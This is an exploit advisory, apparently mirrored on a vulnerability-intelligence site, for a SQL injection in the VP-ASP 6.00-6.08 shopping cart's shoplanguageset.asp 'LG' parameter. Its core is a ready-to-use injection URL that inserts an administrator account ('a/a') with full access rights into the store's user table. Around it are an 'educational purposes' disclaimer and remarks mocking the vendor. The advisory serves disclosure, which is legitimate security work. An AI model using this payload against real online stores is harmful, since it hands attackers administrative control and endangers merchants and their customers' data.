Lucene search
vp-asp-new.txt
VP-ASP 6.00-6.08 SQL Injection / Exploit Advisory by tracewa
Show more
`VP-ASP 6.00-6.08? SQL Injection / Exploit by tracewar([email protected])
I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap.
* this information is for educational purposes only!
* I didn't check this against the new 6.08 patch, but it's probably vulnerable too.
OK for the guys at vp-asp,
you should choose a different coding language for your shopping cart :(
I'm tired of writing vp-asp advisories 24/7 untill you guys release version 7.00
and take the security issue serious, I'm not going to audit your code anymore.
----- THE BUG:
the bug exists in the shoplanguageset.asp file under the "LG" query:
I didn't have a normal vp-asp shopping cart for testings but this hack should work:
add user a/a just like the old one:
/shoplanguageset.asp?LG=English';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
-tracewar`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo22 May 2006 00:00Current
7.4High risk
Vulners AI Score7.4